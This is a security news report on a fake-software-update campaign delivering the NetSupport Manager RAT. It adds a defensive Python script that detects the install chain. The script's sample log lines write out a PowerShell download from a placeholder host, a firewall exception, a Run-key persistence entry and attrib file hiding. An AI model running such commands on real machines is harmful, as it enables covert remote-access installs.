FireEye security experts have found that hackers are leveraging compromised websites to distribute fake software updates that deliver the NetSupport Manager RAT.
NetSupport Manager is an off-the-shelf remote administration tool that system administrators use to manage computers remotely. Cybercriminals abuse this legitimate application to deploy it as malware on users’ PCs.
Recently, security experts at FireEye observed a hacking campaign that has been active for the past few months and leverages compromised websites to spread fake updates for popular software (i.e. Adobe Flash, Chrome, and Firefox); the fake updates deliver the NetSupport Manager remote access tool (RAT).
Once a user runs the fake update, a malicious JavaScript file is downloaded, usually from a Dropbox link.
“Over the last few months, FireEye has tracked an in-the-wild campaign that leverages compromised sites to spread fake updates. In some cases, the payload was the NetSupport Manager remote access tool (RAT),” the FireEye analysis states.
“The operator behind these campaigns uses compromised sites to spread fake updates masquerading as Adobe Flash, Chrome, and FireFox updates.”
The JavaScript file collects information about the target computer and sends it to the server. The server responds with additional commands and a further JavaScript stage that delivers the final payload. This final-stage script is called Update.js and is executed from %AppData% by wscript.exe.
“Since the malware uses the caller and callee function code to derive the key, if the analyst adds or removes anything from the first or second layer script, the script will not be able to retrieve the key and will terminate with an exception,” the analysis reads.
When executed, the JavaScript contacts the command and control (C&C) server and sends a value named ‘tid’ together with the system’s current date, both in an encoded format. The server replies with a response that the script decodes and executes as a function called step2.
The step2 function gathers various system information, encodes it and sends it to the server: computer name, user name, architecture, processors, OS, domain, BIOS version, manufacturer, model, anti-spyware product, anti-virus product, MAC address, keyboard, pointing device, display controller configuration, and process list.
The server then responds with a function called step3 and with Update.js, the script that downloads and executes the final payload.
The JavaScript uses PowerShell commands to download multiple files from the server, including:
- 7za.exe: 7zip standalone executable
- LogList.rtf: Password-protected archive file
- Upd.cmd: Batch script to install the NetSupport Client
- Downloads.txt: List of IPs (possibly the infected systems)
- Get.php: Downloads LogList.rtf
The tasks performed by the script are:
1. Extract the archive using the 7zip executable and the password contained in the script.
2. After extraction, delete the downloaded archive file (loglist.rtf).
3. Disable Windows Error Reporting and App Compatibility.
4. Add the remote control client executable to the firewall’s allowed program list.
5. Run the remote control tool (client32.exe).
6. Add a Run registry entry named “ManifestStore”, or drop a shortcut file into the Startup folder.
7. Hide the files by setting file attributes.
8. Delete all the artifacts (7zip executable, script, archive file).
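The download-and-install chain above leaves a distinctive trail in process-creation telemetry: wscript.exe running Update.js from %AppData%, PowerShell spawned by the script host, 7za.exe unpacking LogList.rtf, a firewall exception for client32.exe, a Run key named “ManifestStore” and attrib hiding the dropped folder. The script below is an added example, not FireEye’s code or anything from the campaign, that runs simple rules for each of those stages over constructed sample log lines and only raises a verdict when several stages appear together, since any one of them (attrib, reg, netsh) is ordinary administrator activity on its own. The log line format, the rule names, the paths and the command lines in the sample are assumptions made for this example.

```python
"""Triage rules for the fake-update / NetSupport Manager chain described above.

Added example, not FireEye's code. Scans constructed process-creation log lines
(format is an assumption: "<time> parent=<image> image=<image> cmd=\"<cmdline>\"")
for the stages the article lists and reports a verdict only when several co-occur.
"""
import re

# Constructed sample telemetry (not real logs); paths and command lines are assumptions.
SAMPLE_LOG = r'''
2018-04-02T10:01:05 parent=chrome.exe image=wscript.exe cmd="wscript.exe C:\Users\bob\AppData\Roaming\Update.js"
2018-04-02T10:01:09 parent=wscript.exe image=powershell.exe cmd="powershell -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/Get.php','LogList.rtf')"
2018-04-02T10:01:20 parent=wscript.exe image=7za.exe cmd="7za.exe x LogList.rtf -pPLACEHOLDER -oC:\Users\bob\AppData\Roaming\ManifestStore"
2018-04-02T10:01:25 parent=cmd.exe image=netsh.exe cmd="netsh firewall add allowedprogram C:\Users\bob\AppData\Roaming\ManifestStore\client32.exe ManifestStore ENABLE"
2018-04-02T10:01:27 parent=cmd.exe image=reg.exe cmd="reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ManifestStore /t REG_SZ /d C:\Users\bob\AppData\Roaming\ManifestStore\client32.exe"
2018-04-02T10:01:28 parent=cmd.exe image=attrib.exe cmd="attrib +h +s C:\Users\bob\AppData\Roaming\ManifestStore"
2018-04-02T10:05:00 parent=explorer.exe image=notepad.exe cmd="notepad.exe C:\Users\bob\notes.txt"
'''

EVENT_RE = re.compile(r'^(?P<time>\S+) parent=(?P<parent>\S+) image=(?P<image>\S+) cmd="(?P<cmd>.*)"$')

# (rule name, parent-image pattern or None, image pattern, command-line pattern or None),
# all matched case-insensitively. One rule per stage of the chain in the article.
RULES = [
    ("wscript_runs_update_js_from_appdata", None, r"^wscript\.exe$", r"\\appdata\\.*\\update\.js"),
    ("powershell_spawned_by_script_host", r"^wscript\.exe$", r"^powershell\.exe$", r"downloadfile|get\.php|loglist\.rtf"),
    ("7zip_extracts_loglist_archive", None, r"^7za\.exe$", r"loglist\.rtf.*\s-p"),
    ("firewall_exception_for_client32", None, r"^netsh\.exe$", r"allowedprogram.*client32\.exe"),
    ("run_key_named_manifeststore", None, r"^reg\.exe$", r"currentversion\\run\b.*manifeststore"),
    ("dropped_folder_hidden_with_attrib", None, r"^attrib\.exe$", r"\+h"),
]


def parse_event(line):
    """Parse one log line into its fields; returns None for lines that do not fit the format."""
    m = EVENT_RE.match(line.strip())
    return m.groupdict() if m else None


def match_rules(event):
    """Return the names of every rule whose parent/image/command-line patterns all match."""
    hits = []
    for name, parent_re, image_re, cmd_re in RULES:
        if parent_re and not re.search(parent_re, event["parent"], re.I):
            continue
        if not re.search(image_re, event["image"], re.I):
            continue
        if cmd_re and not re.search(cmd_re, event["cmd"], re.I):
            continue
        hits.append(name)
    return hits


def triage(log_text, min_stages=3):
    """Return (stages matched, in order of first appearance; verdict string).

    A single stage is noisy (admins run attrib, reg and netsh too), so the verdict
    fires only when at least min_stages distinct stages of the chain are present.
    """
    matched = []
    for line in log_text.splitlines():
        event = parse_event(line)
        if event is None:
            continue
        for name in match_rules(event):
            if name not in matched:
                matched.append(name)
    verdict = "netsupport-fake-update-chain" if len(matched) >= min_stages else "no-detection"
    return matched, verdict


if __name__ == "__main__":
    stages, verdict = triage(SAMPLE_LOG)
    print("verdict:", verdict)
    for stage in stages:
        print("  stage:", stage)
```

Running the script over the constructed sample reports all six stages and the chain verdict; a single reg.exe or attrib.exe event on its own stays below the threshold, which is the point of correlating the stages rather than alerting on each one.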
The attackers use NetSupport Manager to gain remote access to the compromised systems and control them.
The final JavaScript also downloaded a list of IP addresses, which could be other compromised systems, most of them in the U.S., Germany, and the Netherlands.